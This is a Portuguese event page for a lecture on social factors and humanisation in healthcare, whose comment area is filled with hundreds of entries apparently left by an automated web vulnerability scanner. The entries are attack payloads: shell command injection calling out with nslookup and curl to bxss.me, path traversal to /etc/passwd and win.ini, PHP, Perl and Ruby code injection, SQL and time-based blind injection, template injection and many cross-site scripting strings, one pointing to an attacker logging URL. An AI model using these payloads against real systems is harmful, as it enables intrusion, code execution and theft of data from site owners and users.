Actividade

Tipo: palestra Data de Início: 2020-07-01 15:00:00 Data de Fim: 2020-07-31 14:00:00 Promotor: Gabinete de Ética e Humanização Local: Anfiteatro da Escola Técnica de Formação em Saúde

Factores Sociais e a Humanização


Palestra destinada à explicação dos efeitos dos factores sociais sobre a humanização.

...
Testing

555


...
Testing

1GDaxl6EO


...
Testing

555


...
1fhYMVx8O

555


...
Testing

response.write(9149287*9163368)


...
Testing

555


...
Testing

'+response.write(9149287*9163368)+'


...
Testing

"+response.write(9149287*9163368)+"


...
Testing

555


...
Testing

555


...
Testing

555


...
response.write(9729461*9205596)

555


...
'+response.write(9729461*9205596)+'

555


...
"+response.write(9729461*9205596)+"

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

echo alwmlo$()\ hlqrcj\nz^xyu||a #' &echo alwmlo$()\ hlqrcj\nz^xyu||a #|" &echo alwmlo$()\ hlqrcj\nz^xyu||a #


...
Testing

yzJedknc


...
Testing

&echo bxjyzv$()\ rjkdjt\nz^xyu||a #' &echo bxjyzv$()\ rjkdjt\nz^xyu||a #|" &echo bxjyzv$()\ rjkdjt\nz^xyu||a #


...
Testing

555


...
Testing

555&echo eekymd$()\ xgarrp\nz^xyu||a #' &echo eekymd$()\ xgarrp\nz^xyu||a #|" &echo eekymd$()\ xgarrp\nz^xyu||a #


...
Ss1sRHsw

555


...
Testing

|echo cqwgkp$()\ rpsuky\nz^xyu||a #' |echo cqwgkp$()\ rpsuky\nz^xyu||a #|" |echo cqwgkp$()\ rpsuky\nz^xyu||a #


...
Testing

555


...
Testing

555|echo eubhzi$()\ tjkeyl\nz^xyu||a #' |echo eubhzi$()\ tjkeyl\nz^xyu||a #|" |echo eubhzi$()\ tjkeyl\nz^xyu||a #


...
Testing

(nslookup -q=cname hitudrfhuqmae50504.bxss.me||curl hitudrfhuqmae50504.bxss.me))


...
Testing

$(nslookup -q=cname hitjyjmwolyid3b24f.bxss.me||curl hitjyjmwolyid3b24f.bxss.me)


...
Testing

555


...
Testing

&nslookup -q=cname hityzmvgjvbei771fe.bxss.me&'\"`0&nslookup -q=cname hityzmvgjvbei771fe.bxss.me&`'


...
Testing

&(nslookup -q=cname hitjxrhzsotln2ba08.bxss.me||curl hitjxrhzsotln2ba08.bxss.me)&'\"`0&(nslookup -q=cname hitjxrhzsotln2ba08.bxss.me||curl hitjxrhzsotln2ba08.bxss.me)&`'


...
Testing

555


...
Testing

|(nslookup -q=cname hitklqnrcopsbf0835.bxss.me||curl hitklqnrcopsbf0835.bxss.me)


...
Testing

`(nslookup -q=cname hitgtltvdudrz44cf3.bxss.me||curl hitgtltvdudrz44cf3.bxss.me)`


...
Testing

;(nslookup -q=cname hitivsayoerqgaf7ae.bxss.me||curl hitivsayoerqgaf7ae.bxss.me)|(nslookup -q=cname hitivsayoerqgaf7ae.bxss.me||curl hitivsayoerqgaf7ae.bxss.me)&(nslookup -q=cname hitivsayoerqgaf7ae.bxss.me||curl hitivsayoerqgaf7ae.bxss.me)


...
Testing

555


...
Testing

../../../../../../../../../../../../../../etc/passwd


...
Testing

555


...
Testing

../../../../../../../../../../../../../../windows/win.ini


...
Testing

555


...
Testing

file:///etc/passwd


...
Testing

555


...
Testing

555


...
Testing


...
Testing

555


...
Testing

../555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
../../../../../../../../../../../../../../etc/passwd

555


...
Testing

555


...
../../../../../../../../../../../../../../windows/win.ini

555


...
Testing

555


...
file:///etc/passwd

555


...
echo yysnut$()\ dinxxv\nz^xyu||a #' &echo yysnut$()\ dinxxv\nz^xyu||a #|" &echo yysnut$()\ dinxxv\nz^xyu||a #

555


...
Testing

555


...
&echo rizwmb$()\ yotenb\nz^xyu||a #' &echo rizwmb$()\ yotenb\nz^xyu||a #|" &echo rizwmb$()\ yotenb\nz^xyu||a #

555


...
Testing

555


...
../Testing

555


...
Testing&echo czlcdi$()\ zcxmlz\nz^xyu||a #' &echo czlcdi$()\ zcxmlz\nz^xyu||a #|" &echo czlcdi$()\ zcxmlz\nz^xyu||a #

555


...
Testing

555


...
|echo xopdte$()\ ywuavg\nz^xyu||a #' |echo xopdte$()\ ywuavg\nz^xyu||a #|" |echo xopdte$()\ ywuavg\nz^xyu||a #

555


...
Testing

555


...
Testing|echo ujtzbw$()\ teraaw\nz^xyu||a #' |echo ujtzbw$()\ teraaw\nz^xyu||a #|" |echo ujtzbw$()\ teraaw\nz^xyu||a #

555


...
Testing

555


...
(nslookup -q=cname hitbfsukcizqwf35ec.bxss.me||curl hitbfsukcizqwf35ec.bxss.me))

555


...
Testing

555


...
Testing

555<esi:include src="http://bxss.me/rpb.png"/>


...
Testing

555


...
$(nslookup -q=cname hitzghtesjvfe52942.bxss.me||curl hitzghtesjvfe52942.bxss.me)

555


...
Testing

555


...
Testing

555


...
&nslookup -q=cname hitdbxoqtclxdb9fa7.bxss.me&'\"`0&nslookup -q=cname hitdbxoqtclxdb9fa7.bxss.me&`'

555


...
Testing<esi:include src="http://bxss.me/rpb.png"/>

555


...
&(nslookup -q=cname hitmfniffazpha3fda.bxss.me||curl hitmfniffazpha3fda.bxss.me)&'\"`0&(nslookup -q=cname hitmfniffazpha3fda.bxss.me||curl hitmfniffazpha3fda.bxss.me)&`'

555


...
Testing

555


...
|(nslookup -q=cname hitbmgizylosp8a1b5.bxss.me||curl hitbmgizylosp8a1b5.bxss.me)

555


...
Testing

${9999806+9999317}


...
`(nslookup -q=cname hitngpwjidgxrabaf5.bxss.me||curl hitngpwjidgxrabaf5.bxss.me)`

555


...
Testing

555


...
;(nslookup -q=cname hitjgsxsotzij3fe6c.bxss.me||curl hitjgsxsotzij3fe6c.bxss.me)|(nslookup -q=cname hitjgsxsotzij3fe6c.bxss.me||curl hitjgsxsotzij3fe6c.bxss.me)&(nslookup -q=cname hitjgsxsotzij3fe6c.bxss.me||curl hitjgsxsotzij3fe6c.bxss.me)

555


...
${10000444+10000342}

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555&n974527=v938374


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing&n943556=v901726

555


...
Testing

555


...
Testing

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


...
Testing

555


...
Testing

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


...
Testing

555


...
Testing

555


...
Testing

Http://bxss.me/t/fit.txt


...
Testing

555


...
Testing

http://bxss.me/t/fit.txt?.jpg


...
Testing

/etc/shells


...
Testing

c:/windows/win.ini


...
Testing

555


...
Testing

bxss.me


...
Testing

)


...
Testing

'.gethostbyname(lc('hitok'.'ixkpbhytefd5a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(90).chr(101).chr(80).'


...
Testing

555


...
Testing

!(()&&!|*|*|


...
Testing

".gethostbyname(lc("hitht"."uyiunqdka8ab5.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(72).chr(106).chr(69)."


...
Testing

555


...
Testing

^(#$!@#$)(()))******


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
'.gethostbyname(lc('hitna'.'msuhftxff43d2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(88).chr(104).chr(88).'

555


...
Testing

555


...
Testing

555


...
".gethostbyname(lc("hitpg"."kknebhefcf8eb.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(82).chr(108).chr(90)."

555


...
Testing

555


...
)

555


...
Testing

555


...
Testing

555


...
!(()&&!|*|*|

555


...
Testing

555


...
Testing

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


...
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555


...
^(#$!@#$)(()))******

555


...
Testing

';print(md5(31337));$a='


...
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555


...
Testing

555


...
Testing

";print(md5(31337));$a="


...
Http://bxss.me/t/fit.txt

555


...
Testing

555


...
Testing

${@print(md5(31337))}


...
http://bxss.me/t/fit.txt?.jpg

555


...
Testing

555


...
Testing

555


...
Testing

HttP://bxss.me/t/xss.html?%00


...
Testing

${@print(md5(31337))}\


...
/etc/shells

555


...
Testing

bxss.me/t/xss.html?%00


...
Testing

'.print(md5(31337)).'


...
c:/windows/win.ini

555


...
Testing

555


...
Testing

'"()


...
Testing

555


...
bxss.me

555


...
Testing

555


...
Testing

555'&&sleep(27*1000)*ljtxnm&&'


...
Testing

555


...
Testing

555


...
HttP://bxss.me/t/xss.html?%00

555


...
Testing

555"&&sleep(27*1000)*jzxltl&&"


...
Testing

555


...
Testing

555


...
Testing

"+"A".concat(70-3).concat(22*4).concat(105).concat(86).concat(109).concat(69)+(require"socket" Socket.gethostbyname("hitkz"+"xzvhxkmw11a14.bxss.me.")[3].to_s)+"


...
bxss.me/t/xss.html?%00

555


...
Testing

555'||sleep(27*1000)*vxpjef||'


...
Testing

555


...
Testing

555


...
Testing

'+'A'.concat(70-3).concat(22*4).concat(115).concat(79).concat(110).concat(84)+(require'socket' Socket.gethostbyname('hitzb'+'udfzshyg18dc0.bxss.me.')[3].to_s)+'


...
Testing

555


...
Testing

555"||sleep(27*1000)*mworvm||"


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555


...
Testing

555


...
"+"A".concat(70-3).concat(22*4).concat(116).concat(83).concat(113).concat(85)+(require"socket" Socket.gethostbyname("hitfb"+"aupukpouf6e3f.bxss.me.")[3].to_s)+"

555


...
Testing

555


...
';print(md5(31337));$a='

555


...
Testing

555


...
'+'A'.concat(70-3).concat(22*4).concat(115).concat(79).concat(113).concat(68)+(require'socket' Socket.gethostbyname('hitrn'+'mjnnowcyb7017.bxss.me.')[3].to_s)+'

555


...
";print(md5(31337));$a="

555


...
Testing

555


...
Testing

555


...
${@print(md5(31337))}

555


...
Testing

555


...
Testing

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


...
Testing

555


...
${@print(md5(31337))}\

555


...
Testing

555


...
Testing

1


...
Testing

555


...
Testing

555


...
'.print(md5(31337)).'

555


...
Testing

1


...
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555


...
Testing

555


...
Testing

555


...
Testing

xfs.bxss.me


...
Testing

1/.


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
xfs.bxss.me

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
1

555


...
Testing

555


...
Testing

'"


...
1

555


...
'"()

555


...
Testing

<!--


...
1/.

555


...
Testing'&&sleep(27*1000)*xnrobk&&'

555


...
Testing

555


...
Testing

555


...
Testing"&&sleep(27*1000)*zrlvtj&&"

555


...
Testing

555


...
Testing

555


...
Testing

555'"()&%<zzz><ScRiPt >RsR4(9973)</ScRiPt>


...
Testing'||sleep(27*1000)*iiapbk||'

555


...
'"

555


...
Testing

555


...
Testing

555


...
Testing"||sleep(27*1000)*awllhg||"

555


...
<!--

555


...
Testing

555


...
Testing

'"()&%<zzz><ScRiPt >RsR4(9568)</ScRiPt>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

5559058075


...
Testing

555


...
Testing

bfg4524<s1﹥s2ʺs3ʹhjl4524


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

<%={{={@{#{${dfb}}%>


...
Testing

555


...
Testing

<th:t="${dfb}#foreach


...
Testing

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


...
Testing

dfb{{98991*97996}}xca


...
Testing

555


...
Testing

dfb[[${98991*97996}]]xca


...
Testing

dfb__${98991*97996}__::.x


...
Testing

response.write(9079280*9602445)


...
Testing

echo lgrzgx$()\ dtpgnk\nz^xyu||a #' &echo lgrzgx$()\ dtpgnk\nz^xyu||a #|" &echo lgrzgx$()\ dtpgnk\nz^xyu||a #


...
Testing

0OlQaNgF


...
Testing

'+response.write(9079280*9602445)+'


...
Testing

&echo xrqwix$()\ flnzcy\nz^xyu||a #' &echo xrqwix$()\ flnzcy\nz^xyu||a #|" &echo xrqwix$()\ flnzcy\nz^xyu||a #


...
Testing

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


...
Testing

555


...
Testing

"+response.write(9079280*9602445)+"


...
Testing

555&echo ladcwf$()\ yzbyrm\nz^xyu||a #' &echo ladcwf$()\ yzbyrm\nz^xyu||a #|" &echo ladcwf$()\ yzbyrm\nz^xyu||a #


...
dXq67czb

555


...
Testing

555


...
Testing

|echo qmlaii$()\ ztowks\nz^xyu||a #' |echo qmlaii$()\ ztowks\nz^xyu||a #|" |echo qmlaii$()\ ztowks\nz^xyu||a #


...
Testing

555


...
Testing

555<ScRiPt >RsR4(9215)</ScRiPt>


...
Testing

555


...
Testing

555|echo gdpiwk$()\ ywmrks\nz^xyu||a #' |echo gdpiwk$()\ ywmrks\nz^xyu||a #|" |echo gdpiwk$()\ ywmrks\nz^xyu||a #


...
Testing

../../../../../../../../../../../../../../etc/passwd


...
Testing

555


...
Testing

(nslookup -q=cname hithkbsgupzdq65785.bxss.me||curl hithkbsgupzdq65785.bxss.me))


...
Testing

../../../../../../../../../../../../../../windows/win.ini


...
response.write(9977528*9489634)

555


...
Testing

$(nslookup -q=cname hitjgrojsrdnye11c5.bxss.me||curl hitjgrojsrdnye11c5.bxss.me)


...
Testing

555<WKJJZN>SSQPY[!+!]</WKJJZN>


...
Testing

file:///etc/passwd


...
'+response.write(9977528*9489634)+'

555


...
Testing

&nslookup -q=cname hitfmigcimhtccd3f3.bxss.me&'\"`0&nslookup -q=cname hitfmigcimhtccd3f3.bxss.me&`'


...
Testing

555


...
Testing


...
"+response.write(9977528*9489634)+"

555


...
Testing

&(nslookup -q=cname hithnftqarchr27d99.bxss.me||curl hithnftqarchr27d99.bxss.me)&'\"`0&(nslookup -q=cname hithnftqarchr27d99.bxss.me||curl hithnftqarchr27d99.bxss.me)&`'


...
Testing

../555


...
Testing

555<script>RsR4(9732)</script>


...
Testing

555


...
Testing

|(nslookup -q=cname hitqrfcismowzf794f.bxss.me||curl hitqrfcismowzf794f.bxss.me)


...
Testing

555


...
Testing

555


...
Testing

`(nslookup -q=cname hitjrslvbdwbm2d0d4.bxss.me||curl hitjrslvbdwbm2d0d4.bxss.me)`


...
Testing

555


...
Testing

555


...
Testing

;(nslookup -q=cname hitpfxovhmznk9486d.bxss.me||curl hitpfxovhmznk9486d.bxss.me)|(nslookup -q=cname hitpfxovhmznk9486d.bxss.me||curl hitpfxovhmznk9486d.bxss.me)&(nslookup -q=cname hitpfxovhmznk9486d.bxss.me||curl hitpfxovhmznk9486d.bxss.me)


...
Testing

555<script>RsR4(9831)</script>9831


...
Testing

555


...
Testing

555


...
Testing

555<esi:include src="http://bxss.me/rpb.png"/>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<ScR<ScRiPt>IpT>RsR4(9441)</sCr<ScRiPt>IpT>


...
Testing<esi:include src="http://bxss.me/rpb.png"/>

555


...
Testing

555


...
../../../../../../../../../../../../../../etc/passwd

555


...
Testing

555


...
Testing

555


...
../../../../../../../../../../../../../../windows/win.ini

555


...
Testing

${10000354+9999743}


...
Testing

555<ScRiPt >RsR4(9399)</ScRiPt>


...
Testing

555


...
file:///etc/passwd

555


...
Testing

555


...
Testing

555


...
Testing

555


...
${9999416+10000194}

555


...
Testing

555


...
../Testing

555


...
Testing

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9558></ScRiPt>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<ScRiPt >RsR4(9759)</ScRiPt>


...
Testing

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


...
Testing

555


...
Testing

555


...
Testing

Http://bxss.me/t/fit.txt


...
Testing

555


...
Testing

555


...
Testing

http://bxss.me/t/fit.txt?.jpg


...
Testing

555


...
Testing

555


...
Testing

555&n907633=v939893


...
Testing

/etc/shells


...
echo xoqeqe$()\ pjehvw\nz^xyu||a #' &echo xoqeqe$()\ pjehvw\nz^xyu||a #|" &echo xoqeqe$()\ pjehvw\nz^xyu||a #

555


...
Testing

)


...
Testing

555<isindex type=image src=1 onerror=RsR4(9058)>


...
Testing

c:/windows/win.ini


...
&echo rxjwjv$()\ kiqqen\nz^xyu||a #' &echo rxjwjv$()\ kiqqen\nz^xyu||a #|" &echo rxjwjv$()\ kiqqen\nz^xyu||a #

555


...
Testing

!(()&&!|*|*|


...
Testing

bxss.me


...
Testing&echo evnxyp$()\ amlifd\nz^xyu||a #' &echo evnxyp$()\ amlifd\nz^xyu||a #|" &echo evnxyp$()\ amlifd\nz^xyu||a #

555


...
Testing

^(#$!@#$)(()))******


...
Testing

555


...
Testing

555


...
|echo ruibof$()\ uegrqa\nz^xyu||a #' |echo ruibof$()\ uegrqa\nz^xyu||a #|" |echo ruibof$()\ uegrqa\nz^xyu||a #

555


...
Testing

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9252'>


...
Testing

555


...
Testing

555


...
Testing|echo empdyj$()\ plnngv\nz^xyu||a #' |echo empdyj$()\ plnngv\nz^xyu||a #|" |echo empdyj$()\ plnngv\nz^xyu||a #

555


...
Testing

555


...
Testing

555


...
(nslookup -q=cname hitfxcegflpcl3b6cd.bxss.me||curl hitfxcegflpcl3b6cd.bxss.me))

555


...
Testing&n907378=v986825

555


...
Testing

555<body onload=RsR4(9030)>


...
Testing

555


...
Testing

555


...
$(nslookup -q=cname hitlpjnieluhxe19ec.bxss.me||curl hitlpjnieluhxe19ec.bxss.me)

555


...
)

555


...
Testing

555


...
&nslookup -q=cname hitphxqvjemiaaf999.bxss.me&'\"`0&nslookup -q=cname hitphxqvjemiaaf999.bxss.me&`'

555


...
Testing

555


...
!(()&&!|*|*|

555


...
Testing

555


...
&(nslookup -q=cname hitfdonfbxrkv5c21b.bxss.me||curl hitfdonfbxrkv5c21b.bxss.me)&'\"`0&(nslookup -q=cname hitfdonfbxrkv5c21b.bxss.me||curl hitfdonfbxrkv5c21b.bxss.me)&`'

555


...
Testing

555<img src=//xss.bxss.me/t/dot.gif onload=RsR4(9198)>


...
^(#$!@#$)(()))******

555


...
Testing

555


...
|(nslookup -q=cname hitfklclbbbepff8ce.bxss.me||curl hitfklclbbbepff8ce.bxss.me)

555


...
Testing

555


...
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555


...
`(nslookup -q=cname hitkdyinkqfplb69da.bxss.me||curl hitkdyinkqfplb69da.bxss.me)`

555


...
Testing

555<img src=xyz OnErRor=RsR4(9339)>


...
Testing

555


...
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555


...
;(nslookup -q=cname hitcjyhkzvanfbffce.bxss.me||curl hitcjyhkzvanfbffce.bxss.me)|(nslookup -q=cname hitcjyhkzvanfbffce.bxss.me||curl hitcjyhkzvanfbffce.bxss.me)&(nslookup -q=cname hitcjyhkzvanfbffce.bxss.me||curl hitcjyhkzvanfbffce.bxss.me)

555


...
Testing

555


...
Testing

555


...
Http://bxss.me/t/fit.txt

555


...
Testing

555


...
Testing

'.gethostbyname(lc('hitig'.'rkwrvzot81ec1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(67).chr(119).chr(85).'


...
http://bxss.me/t/fit.txt?.jpg

555


...
Testing

555


...
Testing

555<img/src=">" onerror=alert(9519)>


...
Testing

".gethostbyname(lc("hitpr"."rmvyxvqp253f6.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(68).chr(112).chr(82)."


...
/etc/shells

555


...
Testing

555


...
Testing

'"()


...
Testing

555


...
c:/windows/win.ini

555


...
Testing

555


...
Testing

555'&&sleep(27*1000)*tqdxdz&&'


...
Testing

555


...
bxss.me

555


...
Testing

%35%35%35%3C%53%63%52%69%50%74%20%3E%52%73%52%34%289089%29%3C%2F%73%43%72%69%70%54%3E


...
Testing

555


...
Testing

555"&&sleep(27*1000)*ppzfbi&&"


...
'.gethostbyname(lc('hitcw'.'hmtdxxux6b356.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(82).chr(109).chr(67).'

555


...
Testing

555


...
Testing

555


...
Testing

555'||sleep(27*1000)*rcqwjc||'


...
".gethostbyname(lc("hitye"."htdxjpphcc16c.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(87).chr(122).chr(83)."

555


...
Testing

555


...
Testing

555


...
Testing

555\u003CScRiPt\RsR4(9277)\u003C/sCripT\u003E


...
Testing

555"||sleep(27*1000)*hjlgek||"


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


...
Testing

555&lt;ScRiPt&gt;RsR4(9529)&lt;/sCripT&gt;


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

';print(md5(31337));$a='


...
Testing

555


...
Testing

555


...
Testing

";print(md5(31337));$a="


...
Testing

555


...
Testing

555


...
Testing

${@print(md5(31337))}


...
Testing

HttP://bxss.me/t/xss.html?%00


...
Testing

"+"A".concat(70-3).concat(22*4).concat(113).concat(78).concat(105).concat(66)+(require"socket" Socket.gethostbyname("hitmu"+"pomdksll5e3d7.bxss.me.")[3].to_s)+"


...
Testing

555


...
Testing

555<input autofocus onfocus=RsR4(9421)>


...
Testing

${@print(md5(31337))}\


...
Testing

bxss.me/t/xss.html?%00


...
Testing

'+'A'.concat(70-3).concat(22*4).concat(116).concat(69).concat(103).concat(90)+(require'socket' Socket.gethostbyname('hithh'+'ubgmvxvy7abc8.bxss.me.')[3].to_s)+'


...
Testing

555


...
Testing

'.print(md5(31337)).'


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

<a HrEF=http://xss.bxss.me></a>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
HttP://bxss.me/t/xss.html?%00

555


...
"+"A".concat(70-3).concat(22*4).concat(119).concat(89).concat(110).concat(76)+(require"socket" Socket.gethostbyname("hitpw"+"nctdtiiobedaf.bxss.me.")[3].to_s)+"

555


...
Testing

555


...
Testing

555


...
bxss.me/t/xss.html?%00

555


...
'+'A'.concat(70-3).concat(22*4).concat(112).concat(71).concat(97).concat(84)+(require'socket' Socket.gethostbyname('hitqy'+'grxqxjdd010be.bxss.me.')[3].to_s)+'

555


...
Testing

<a HrEF=jaVaScRiPT:>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555}body{zzz:Expre/**/SSion(RsR4(9888))}


...
Testing

1


...
Testing

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


...
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555


...
Testing

1


...
Testing

555


...
';print(md5(31337));$a='

555


...
Testing

1/.


...
'"()

555


...
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555


...
Testing

555l1yp7 <ScRiPt >RsR4(9497)</ScRiPt>


...
";print(md5(31337));$a="

555


...
Testing

555


...
Testing'&&sleep(27*1000)*ubkwcc&&'

555


...
Testing

555


...
${@print(md5(31337))}

555


...
Testing

555


...
Testing"&&sleep(27*1000)*iqnpsh&&"

555


...
Testing

xfs.bxss.me


...
${@print(md5(31337))}\

555


...
Testing

555<WMHWVN>LRK6T[!+!]</WMHWVN>


...
Testing

555


...
Testing'||sleep(27*1000)*uktywu||'

555


...
Testing

555


...
'.print(md5(31337)).'

555


...
1

555


...
Testing"||sleep(27*1000)*cimnfa||"

555


...
xfs.bxss.me

555


...
Testing

555


...
1

555


...
Testing

555


...
Testing

555<ifRAme sRc=9948.com></IfRamE>


...
Testing

555


...
1/.

555


...
Testing

'"


...
Testing

555gzxEwbtb


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

<!--


...
Testing

555


...
Testing

555<aa5H174 x=9230>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555'"()&%<zzz><ScRiPt >quKk(9927)</ScRiPt>


...
'"

555


...
Testing

555<img sRc='http://attacker-9088/log.php?


...
Testing

555'"()&%<zzz><ScRiPt >soVp(9822)</ScRiPt>


...
Testing

555


...
<!--

555


...
Testing

555


...
Testing

555


...
Testing

'"()&%<zzz><ScRiPt >quKk(9154)</ScRiPt>


...
Testing

555


...
Testing

555<a6WoGvl<


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing'"()&%<zzz><ScRiPt >BFQo(9840)</ScRiPt>

555


...
Testing

'"()&%<zzz><ScRiPt >soVp(9334)</ScRiPt>


...
Testing

5559184183


...
Testing

555


...
Testing

555


...
Testing

555


...
'"()&%<zzz><ScRiPt >BFQo(9677)</ScRiPt>

555


...
Testing

bfg3999<s1﹥s2ʺs3ʹhjl3999


...
Testing

5559896127


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing9348637

555


...
Testing

<%={{={@{#{${dfb}}%>


...
Testing'"()&%<zzz><ScRiPt >RsR4(9386)</ScRiPt>

555


...
Testing

<th:t="${dfb}#foreach


...
Testing

555


...
'"()&%<zzz><ScRiPt >RsR4(9084)</ScRiPt>

555


...
Testing

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


...
Testing

dfb{{98991*97996}}xca


...
Testing9724562

555


...
Testing

555


...
Testing

-1 OR 2+187-187-1=0+0+0+1 --


...
Testing

dfb[[${98991*97996}]]xca


...
bfg5990<s1﹥s2ʺs3ʹhjl5990

555


...
Testing

-1 OR 2+70-70-1=0+0+0+1


...
Testing

-1' OR 2+446-446-1=0+0+0+1 --


...
Testing

dfb__${98991*97996}__::.x


...
Testing

-1' OR 2+879-879-1=0+0+0+1 or 'xAZocneu'='


...
Testing

-1" OR 2+74-74-1=0+0+0+1 --


...
<%={{={@{#{${dfb}}%>

555


...
Testing

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


...
<th:t="${dfb}#foreach

555


...
Testing

555<ScRiPt >quKk(9462)</ScRiPt>


...
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555


...
Testing

555<WFONZI>TD7A2[!+!]</WFONZI>


...
dfb{{98991*97996}}xca

555


...
Testing

555<script>quKk(9371)</script>


...
dfb[[${98991*97996}]]xca

555


...
Testing

555<script>quKk(9310)</script>9310


...
dfb__${98991*97996}__::.x

555


...
Testing

555<ScR<ScRiPt>IpT>quKk(9387)</sCr<ScRiPt>IpT>


...
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555


...
Testing

555<ScRiPt >quKk(9545)</ScRiPt>


...
Testing<ScRiPt >RsR4(9979)</ScRiPt>

555


...
Testing

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9758></ScRiPt>


...
Testing<W50FSK>FYPVF[!+!]</W50FSK>

555


...
Testing

555<ScRiPt >quKk(9136)</ScRiPt>


...
Testing

555*if(now()=sysdate(),sleep(15),0)


...
Testing<script>RsR4(9984)</script>

555


...
Testing

555<isindex type=image src=1 onerror=quKk(9613)>


...
Testing<script>RsR4(9997)</script>9997

555


...
Testing

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9508'>


...
Testing<ScR<ScRiPt>IpT>RsR4(9318)</sCr<ScRiPt>IpT>

555


...
Testing

555<body onload=quKk(9689)>


...
Testing<ScRiPt >RsR4(9457)</ScRiPt>

555


...
Testing

555<img src=//xss.bxss.me/t/dot.gif onload=quKk(9021)>


...
Testing<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9252></ScRiPt>

555


...
Testing

555<img src=xyz OnErRor=quKk(9455)>


...
Testing<ScRiPt >RsR4(9198)</ScRiPt>

555


...
Testing

555<img/src=">" onerror=alert(9906)>


...
Testing<isindex type=image src=1 onerror=RsR4(9048)>

555


...
Testing

%35%35%35%3C%53%63%52%69%50%74%20%3E%71%75%4B%6B%289295%29%3C%2F%73%43%72%69%70%54%3E


...
Testing<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9718'>

555


...
Testing

555\u003CScRiPt\quKk(9280)\u003C/sCripT\u003E


...
Testing<body onload=RsR4(9797)>

555


...
Testing

555&lt;ScRiPt&gt;quKk(9184)&lt;/sCripT&gt;


...
Testing

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z


...
Testing<img src=//xss.bxss.me/t/dot.gif onload=RsR4(9558)>

555


...
Testing

555<input autofocus onfocus=quKk(9145)>


...
Testing<img src=xyz OnErRor=RsR4(9886)>

555


...
Testing

<a HrEF=http://xss.bxss.me></a>


...
Testing

555


...
Testing<img/src=">" onerror=alert(9348)>

555


...
Testing

<a HrEF=jaVaScRiPT:>


...
